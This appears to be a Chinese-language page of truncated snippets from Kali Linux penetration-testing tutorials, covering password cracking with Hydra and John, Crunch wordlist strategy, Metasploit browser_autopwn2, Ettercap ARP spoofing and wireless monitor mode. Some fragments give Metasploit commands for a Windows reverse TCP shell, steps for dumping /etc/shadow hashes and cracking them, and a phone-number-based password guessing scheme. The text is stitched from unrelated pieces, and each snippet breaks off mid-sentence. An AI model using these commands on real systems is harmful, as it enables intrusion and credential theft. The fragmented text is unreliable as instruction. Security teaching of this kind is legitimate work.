第八章 密码攻击 作者:Willie L. Pritchett, David De Smet 译者:飞龙 协议:CC BY-NC-SA 4.0 这一章中,我们要探索一些攻击密码来获得用户账户的方式.密码破解是所有渗透测试者都需要执行的任务.本质上,任何系统的最不安全的部分就是由用户提交的密码.无论密码策略如何,人们必然讨厌输入强密码,或者时常更新它们.这会使它们易于成为黑客的目标. 8.1 在线密码攻击 这个秘籍中我们会使用 Hydra 密码破解器.有时候我们有机会来物理攻击基于 Windows…

在线密码攻击在渗透测试中很重要,但对于测试过程中得到的哈希,加密数据,又需要离线破解工具辅助解决 Creddump套件 kali下离线攻击工具中的Cache-dump,lsadump,pwdump,均为creddump套件,的一部分 Chntpw 用来修改Windows SAM文件实现系统密码修改,亦可在kali作为启动盘时做删除密码的用途  这里有一个该工具使用的链接http://blog.csdn.net/pyufftj/article/details/20387189 Crunch 实用的…

浏览器攻击 browser_autpwn2 (BAP2) mkdir /test 为接受响应的服务器创建目录   use auxiliary/server/browser_autopwn2  set SRVHOST 192.168.56.1  set URIPATH /test #假设我们的攻击目标是 PC,并不打算依赖于 Adobe Flash 的授权.我们会排除 Android 和 Flash 的利用.   set EXCLUDE_PATTERN android|adobe_flash   …

最近的一次渗透测试里,在我们捕获的一些数据包中发现了一些未经加密的 Microsoft SQL Server(MSSQL) 流量.起初,我们认为这样就可以直接嗅探到认证凭证,然而,MSSQL 加密了认证的流量,这就意味着我们需要先解密才能获取到认证凭证.如果安装的是一个自签名证书,就很容易进行破解. 不幸的是,破解 MSSQL 加密不在授权范围之内,我们不得不先放下好奇心完成对客户的渗透测试.不过,因为心里总想着一件事以至于无法继续正常进行工作,我们可以在没有用户凭证的情况下攻击 SQL Ser…

http://blog.csdn.net/wingstudio_zongheng/article/details/51435212 1.前期准备 1)打开一个终端  执行命令: ifconfig   #查看无线网卡,找到他的name(我的无线网卡名字为wlano 接下来我就以我的无线网卡名做讲解) ifconfig wlan0 down #关闭无线网卡(ifconfig 无线网卡名 down) iwconfig wlan0 mode monitor  # 将无线网卡模式改为监听模式(iwconf…

网络漏洞攻击工具 Metasploit 先msfupdate升级: 然后选择msfconsole: 接下来: set LHOST 本机IP地址 setLPORT setg PAYLOAD windows/shell/reverse_tcp setg RHOST 目标IP地址 setg port set target 随意数字 exploit 这样就可以反弹一个cmd shell了. 密码破解 Hydra 多samba,smb,ssh,smtp,telnet,mysql,ftp,vnc,icq,s…

原则:密码以8-10位为主.11位仅限于当地手机号.一般人的多年用数字做密码的习惯和心理,先数 字.再字母,或数字.字母重复几遍,字符几乎全用小写,所以淘汰大写及"~!@#$%^&*()_+"之类的字 符,否则运算量太大. ①11位当地手机号码(移动+联通+电信). [[字典生成器生成]] ②带区号当地固话+不带区号当地固话(如果不够8位,例如7位,最后补一位数字或字母补齐8位.9位 .10位).注:本地首号固定,第二位4位可选,故生成8位字典1400万左右.9位5.1亿(如果…

实验环境:kali 实验工具:john 所用命令: 1.查看/etc目录下的shadow文档,此文档记录了所有用户的用户名及密码hash值 2.使用命令echo 用户名:密码 > shadow,将查到的用户名及hash另存到桌面的shadow文档 3.创建用户:useradd 用户名 修改密码:passwd 用户名,输入新密码 4.john暴力破解密码:john --format=sha512crpty shadow 5.john字典破解密码:john --w:password.lst --fo…

一.Ettercap 使用教程 EtterCap是一个基于ARP地址欺骗方式的网络嗅探工具.它具有动态连接嗅探.动态内容过滤和许多其他有趣的技巧.它支持对许多协议的主动和被动分析,并包含许多用于网络和主机分析的特性.主要适用于交换局域网络,借助于EtterCap嗅探软件,渗透测试人员可以检测网络内明文数据通讯的安全性,及时采取措施,避免敏感的用户名/密码等数据以明文的方式进行传输. 实验环境:Kali Linux2018.2 1. 由于我用的是kali linux 2018.2 版本,已经内置了…

官方2020年一月28日的文章中指出root/toor is dead. Long live kali/kali. 登录用户名和密码是kali:kali 但是虚拟机镜像下载页面没有及时更新,仍然提示登录密码为toor,多次报错后我下意识的认为出现了大学霸_IT达人所提到的问题.虽然是因为自己眼瞎导致问题,但是也积累了一种强制修改密码的方法. 强制修改kali密码 (其他linux系统应该也可以) 根据大学霸的提示:"使用root用户登录,可能遭遇鉴定错误.遇到这种情况,启动时候以单例模式进入命令…